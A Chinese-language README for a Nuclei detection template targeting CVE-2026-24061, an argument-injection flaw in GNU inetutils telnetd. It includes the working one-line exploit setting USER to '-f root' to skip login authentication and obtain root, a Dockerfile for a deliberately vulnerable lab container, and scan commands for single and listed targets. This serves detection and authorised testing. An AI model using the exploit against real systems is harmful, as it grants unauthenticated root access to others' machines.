用于检测 GNU inetutils telnetd 中 CVE-2026-24061 漏洞的 Nuclei 模板,该漏洞允许在无需认证的情况下获取 root 访问权限。
CVE-2026-24061 是 GNU inetutils telnetd 中的一个严重 参数注入 漏洞,允许攻击者在不知道密码的情况下获取 root shell。
%U 的新登录模板: /usr/bin/login -p -h %h %?u{-f %u}{%U}
漏洞:环境变量 USER 通过 telnet 协议(RFC 1572 NEW-ENVIRON)传递,并且在替换到命令中之前 未经过净化处理。
利用方式:攻击者在连接时设置 USER="-f root":
USER="-f root" telnet -a target.com 23
/usr/bin/login -p -h hostname -f root
-f 标志表示 "跳过认证" → 无需密码即可获得 root 💀
inetutils-telnetd 2:2.0-1+deb11u2nuclei -t cve-2026-24061.yaml -u target.com:23 -code
nuclei -t cve-2026-24061.yaml -l targets.txt -code
为了进行测试,可以启动一个存在漏洞的 Docker 容器:
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
启动方式:
# 构建镜像
docker build -t vuln-telnetd .
# 运行
docker run -d -p 2323:23 vuln-telnetd
# 检查漏洞
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
9.8 / 10 - 严重
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
此工具 仅用于 对您拥有明确授权的系统进行合法的安全测试。
作者不对该模板的非法使用承担任何责任。
Created by Mr.Zapi